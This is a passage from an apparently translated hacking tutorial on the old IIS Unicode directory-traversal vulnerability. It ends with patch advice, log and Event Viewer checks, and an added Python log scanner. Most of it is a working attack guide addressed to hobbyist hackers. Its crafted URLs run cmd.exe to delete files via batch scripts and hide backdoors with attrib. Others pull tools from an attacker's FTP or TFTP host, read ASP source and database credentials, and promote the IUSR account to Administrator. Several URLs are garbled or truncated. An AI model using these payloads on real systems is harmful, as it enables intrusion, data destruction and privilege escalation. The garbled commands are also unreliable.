) = %29   # = %23   $ = %24   % = %25   ^ = %5E   & = %26   " = %22
| = %7C   ; = %3B   ' = %27   : = %3A   ? = %3F   , = %2C   ~ = %7E
! = %21
The other three characters, - @ *, can be written directly.
Warning:
All of the following methods are seriously dangerous. Host administrators can test their own hosts with these methods to understand the serious consequences of the vulnerability; individual HACK enthusiasts, please test only on your own machine.
All consequences and legal disputes caused by experiments are borne by the experimenter.
1. Bat command method
Many articles do not introduce how to use BAT commands with the unicode encoding vulnerability, but in practice batch files can execute many commands that cannot be executed from the address bar and can simplify the input process.
example:
del /f /s /q c:\files\*.*
rd c:\files
We can create and execute it with:
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+del%20/f%20/s%20/q%20c:\files\*.*>
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+rd%20c:\files>>
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+baddel
As a result, the files directory and the files in it on the C drive are deleted.
If we change the batch file to format d:/q, the D disk is formatted.
Similarly, batch files can be used for more attacks, so you need to review DOS commands and their uses.
Note: the third line above executes the batch file; do not type .bat there.
2. The use of attrib
This command checks and modifies file attributes.
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?c:\inetpub\wwwroot\
After running we can see the file attributes; often we cannot modify a file because it is set to read-only.
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?%20%2br%20%2bh%20d:\inetpub\wwwroot\
After running, the file is set to read-only and hidden. If we hide a backdoor program this way and the administrator has not set all files to be visible, isn't it very convenient to upload things without the administrator discovering them?
Note that %2b is equal to +
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?%20-r%20-h%20d:\inetpub\wwwroot\
After running, the file's attributes are removed.
3. The use of ftp
Sometimes we need to upload files we want to use to the target host from an FTP host on which we have permissions. For example, you must of course first put these files in your own space.
……/?/c+echo+open+*.*.*.*>
……/?/c+echo+user>>
……/?/c+echo+pass>>
……/?/c+echo+get+>>
……/?/c+echo+bye>>
Then run
……/cmd".exe?/c+ftp+-s:
……/?/c+del
After the above steps, the file is already in the inetpub/scripts directory.
The rest depends on how you use the software:
/scripts/..%c1%1c../winnt/system32/?/c+c:\inetpub\scripts\n
4. TFTP application
Regarding the use of TFTP, we introduced the tool in Complete Guide 5. It can be run under WIN9X, NT or WIN2K, provided the PERL server program is installed on your machine, which is a little difficult for ordinary enthusiasts.
In fact, if you use an NT system or own a compromised NT host, you can use the software in WINNT\SYSTEM32 for downloading.
tftp/?
Transfers files to and from a remote computer running the TFTP service.
TFTP [-i] host [GET | PUT] source [destination]
-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.
host Specifies the local or remote host.
GET Transfers the file destination on the remote host to
the file source on the local host.
PUT Transfers the file source on the local host to
the file destination on the remote host.
source Specifies the file to transfer.
destination Specifies where to transfer the file.
The help text is in English; please translate it yourself.
The command as a UNICODE request:
/scripts/?-i+127.0.0.1+get+
5. ASP-related issues
Generally speaking, most NT machines run WEB applications written in ASP together with SQL databases.
Everyone knows that a leak of ASP code means the ASP source code you worked hard to write is obtained for free, and at the same time your site becomes easy to attack. There are many kinds of vulnerabilities that leak ASP source code; likewise, through the UNICODE vulnerability your ASP source code can easily be obtained.
Even assuming your application is well written, the intruder can still view your files with the type command:
../?/type c:\inetpub\wwwroot\
or with the copy command:
../?/copy c:\inetpub\wwwroot\ c:\inetpub\wwwroot\
and then download your source code directly and locate your database file by analysing it.
If you use SQL Server for your database, the intruder can view your ASP source code, find your username and password by analysing it, and then attack through a SQL remote management client.
So what safety is left for your business secrets and website information?
The intruder can also upload an ASP backdoor program (ASE, which you have probably heard of and used) to your host and hide it; even if you patch the UNICODE vulnerability later, until you discover the backdoor the intruder can still view, modify and delete WEB files on your host.
6. Obtaining super user permissions
Hacking software (such as l0phtcrack) can be used to brute-force your SAM file.
The upload method introduced above can also be used to transfer such tools to the target host.
Then some software or method is used to obtain the computer name of the target host, and with it the IUSR_ComputerName account is promoted to Administrator:
/scripts/?IUSR_Computer Name
After that, what can't be done? It is equivalent to full control of the host.
8. Unicode security issues
1. Fixing the Unicode vulnerability
Simple measures:
Restrict network users' permission to access and run CMD.
If the SCRIPTS or MSADC directory is not needed, delete the folder or rename it.
Do not use the default WINNT path when installing the NT system; change it to badboy or some other folder name.
Of course, the best way is to download the patch provided by m$, the most famous patch company.
The vulnerability patch is released with Microsoft Security Announcement MS00-057
(/technet/security/bulletin/)
You can download the patch from the following address:
IIS 4.0
/ntserver/nts/downloads/critical/q301625/
IIS 5.0
/windows2000/downloads/critical/q301625/
2. Checking whether a hacker has exploited the Unicode vulnerability
Check the log files
Web access records are kept in the winnt\system32\logfiles\w3svc1\ directory.
If someone has accessed you through the UNICODE vulnerability, records similar to the following appear in the log:
13:46:07 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 401
13:46:07 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 200
If someone has executed intrusion commands such as COPY, del, echo or a .bat file, the records look like:
13:47:37 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 401
13:47:37 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 502
The FTP logs can be found in the winnt\system32\logfiles\msftpsvc1 directory.
If someone has executed an FTP command, records similar to the following can be seen in the log file:
13:59:25 127.0.0.1 [2]USER badboy 331
13:59:25 127.0.0.1 [2]PASS - 230
13:59:25 127.0.0.1 [2]sent / 226
13:59:25 127.0.0.1 [2]QUIT - 226
Here, intruder enthusiasts, please note: whatever file you download from some site by making the target host connect to FTP is recorded, so do not think you can escape the evidence of your intrusion by deleting files or renaming them.
We do not rule out the possibility that intruders use proxy servers.
Of course, if you know that someone has exploited your host but cannot find the record in these logs, you should pay even more attention, because whoever did it is no ordinary rookie.
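A small log scanner for the records described above, added here as an example (it is not code from the original article). It models the lenient decoding the article describes for %c0 and %c1 lead bytes, flags requests that reach cmd.exe or carry the intrusion commands listed above, and runs over constructed sample lines in the article's "time ip method uri status" shape; real W3C logs carry more fields.

```python
# Added example (not from the original article): scan IIS W3SVC log lines for
# the Unicode traversal requests the article describes. The sample lines are
# constructed in the 'time ip method uri status' shape shown in the article.
import re
from typing import Optional
from urllib.parse import unquote_plus

# 0xC0/0xC1 lead bytes are never valid UTF-8 (overlong); the article says IIS
# decoded them anyway, turning %c0%af into '/' and %c1%1c or %c1%9c into '\'.
OVERLONG = re.compile(r"%(c[01])%([0-9a-f]{2})", re.IGNORECASE)
# Commands the article lists as signs of intrusion once cmd.exe is reachable.
SUSPECT = re.compile(r"\b(copy|del|echo|type|ftp|tftp|attrib)\b|\.bat\b", re.IGNORECASE)

def decode_overlong(uri: str) -> str:
    """Model the lenient decoding the article describes: combine the lead
    byte's low 5 bits with the trail byte's low 6 bits even when the trail
    byte is not a valid continuation byte (so %c1%1c -> 0x5c = '\\')."""
    def repl(m: re.Match) -> str:
        lead, trail = int(m.group(1), 16), int(m.group(2), 16)
        return chr(((lead & 0x1F) << 6) | (trail & 0x3F))
    # unquote_plus also maps '+' to a space and %2b to a literal '+'.
    return unquote_plus(OVERLONG.sub(repl, uri))

def classify(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it looks benign."""
    parts = line.split(None, 4)
    if len(parts) != 5:
        return None
    time, ip, method, uri, status = parts
    decoded = decode_overlong(uri)
    overlong = OVERLONG.search(uri) is not None
    traversal = "../" in decoded or "..\\" in decoded
    if not (overlong or traversal):
        return None
    low = decoded.lower()
    return {"time": time, "ip": ip, "status": int(status), "overlong": overlong,
            "traversal": traversal, "cmd_exe": "cmd" in low and ".exe" in low,
            "suspect_command": SUSPECT.search(decoded) is not None,
            "decoded": decoded}

def scan(log_text: str) -> list:
    return [f for f in map(classify, log_text.splitlines()) if f]

# Constructed sample log in the article's format (one benign line, three hits).
SAMPLE_LOG = r"""13:46:07 127.0.0.1 GET /default.asp 200
13:46:07 127.0.0.1 GET /scripts/..%c1%1c../winnt/system32/cmd".exe?/c+dir 200
13:47:37 127.0.0.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\a.asp+d:\a.txt 502
13:47:40 127.0.0.1 GET /scripts/..%c1%9c../winnt/system32/attrib.exe?%20%2br%20%2bh%20d:\inetpub\wwwroot\ 200
"""
```

Calling scan(SAMPLE_LOG) returns the three traversal lines with their decoded form, so the attrib +r +h request and the copy command become readable instead of hiding behind %c1%9c and %2b.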
Check the error records in the Event Viewer
We can also find the footprints of intruders in the Event Viewer under Administrative Tools, for example a burst of warning messages within a certain period of time. The information looks similar to the following:
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 100
Date: 2001-2-2
Time: 21:51:26
User: N/A
Computer: CLUB-BUM1HOYJHJ
Description:
The server was unable to log on the Windows NT account 'CLUB-BUM1HOYJHJ\badboy' due to the following error: unknown user name or bad password. The data is the error code.
For more information about this message, visit the Microsoft Online Support site: /.
Data:
0000: 2e 05 00 00 ....